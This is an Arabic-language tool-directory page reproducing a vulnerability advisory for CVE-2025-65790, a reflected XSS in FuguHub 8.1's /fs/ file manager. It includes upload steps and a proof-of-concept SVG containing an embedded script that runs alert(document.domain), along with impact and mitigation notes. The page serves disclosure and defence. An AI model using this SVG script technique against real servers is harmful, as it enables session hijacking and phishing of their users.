Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790 — ثغرة البرمجة النصية العابرة للمواقع المنعكسة (XSS) عبر تقديم SVG في FuguHub | Kitploit
أدوات/GitHubGitHub/hunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubhunterxxx/fuguhub-8.1-reflected-svg-xss-cve-2025-65790

FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790

ثغرة البرمجة النصية العابرة للمواقع المنعكسة (XSS) عبر تقديم SVG في FuguHub

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

CVE-2025-65790 - FuguHub 8.1 ثغرة XSS منعكسة عبر SVG

ثغرة Cross-Site Scripting (XSS) منعكسة عبر عرض SVG في FuguHub

https://www.cve.org/CVERecord?id=CVE-2025-65790

يُوثق هذا المستودع ثغرة Cross-Site Scripting (XSS) منعكسة في FuguHub 8.1، حيث يتم تنفيذ ملفات SVG التي تحتوي على JavaScript مضمّن عند عرضها عبر واجهة مدير الملفات الداخلية /fs/.

CVE المعين: CVE-2025-65790
اكتشفه: Han Tek Foo
الشدة: عالية
التأثير: تنفيذ JavaScript عشوائي

مقدمة

FuguHub هو خادم وسائط قائم على السحابة تم تطويره بواسطة Real Time Logic / Sesamt Data AB. أثناء اختبار تثبيت افتراضي، تم تحديد ثغرة cross-site scripting (XSS) منعكسة في معالجة ملفات SVG التي يتم تقديمها عبر مدير الملفات المدمج في FuguHub. يتم تنفيذ JavaScript ضار مضمّن داخل ملف SVG تلقائيًا عند فتح الملف عبر واجهة /fs/. وهذا يسمح للمهاجمين عن بُعد بتنفيذ JavaScript عشوائي في متصفح الضحية.

البيئة المختبرة

نظام التشغيل: Debian Linux (تثبيت جديد)

إصدار FuguHub: أحدث تنزيل حتى 2025-11-12

العنوان المختبر:

http://127.0.0.1/fs/

لا يعرض FuguHub رقم إصدار صريح في واجهة المستخدم. تم إجراء الاختبار على تثبيت نظيف مباشرة من صفحة التحميل الرسمية.

إثبات المفهوم

أولاً، قم بتنزيل وتشغيل أحدث إصدار من FuguHub:

wget https://fuguhub.com/install/FuguHub.linux.install

chmod +x FuguHub.linux.install

sudo ./FuguHub.linux.install

  1. انتقل إلى قسم Web-File-Server ثم إلى Web File Manager:

alt text

  1. في Web File Manager، قم برفع xss.svg:

alt text

  1. تم رفع xss.svg بنجاح

alt text

  1. عند النقر على xss.svg، يقوم المتصفح بتشغيل XSS ويظهر التنبيه النطاق “127.0.0.1” عبر alert(document.domain)، مما يؤكد XSS المنعكس.

alt text

فيما يلي كود xss.svg الذي استخدمته في إثبات المفهوم:

root@kitploit:~
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
      alert(document.domain);
   </script>
</svg>

🧩 السبب الجذري

يقوم FuguHub بتقديم ملفات SVG مباشرة دون تنقية أو تصفية للنصوص. تعالج المتصفحات SVG كمحتوى XML نشط وتقوم بتنفيذ عناصر <script> المضمّنة، مما يؤدي إلى XSS منعكس.

🛡 التأثير

قد يؤدي تنفيذ JavaScript الذي يتحكم فيه المهاجم إلى:

  • اختطاف بيانات الاعتماد/الجلسة (إذا لم تكن الكوكيز من نوع HttpOnly)
  • التلاعب بواجهة المستخدم، التصيد
  • إجبار المستخدم على تنفيذ إجراءات داخل التطبيق
  • توسيع سطح الهجوم عبر المستخدمين

🛠 توصيات التخفيف

  • إزالة علامات <script> وسمات الأحداث من ملفات SVG
  • تعطيل تنفيذ النصوص المضمّنة أو فرض العزل (sandboxing)
  • تطبيق سياسة أمان المحتوى Content-Security-Policy (CSP) قوية
  • تقييد رفع SVG أو تحويلها إلى صور نقطية (PNG)
  • تنقية/تحليل SVG قبل التقديم عبر /fs/

🏷 معلومات CVE

تم تعيين CVE-2025-65790 لهذه المشكلة بواسطة MITRE.

لنقل حالة CVE من RESERVED → PUBLIC، يتم تقديم هذا المستودع إلى MITRE كمرجع عام.

الإسناد

اكتشفه:
Han Tek Foo

تنزيل الأداة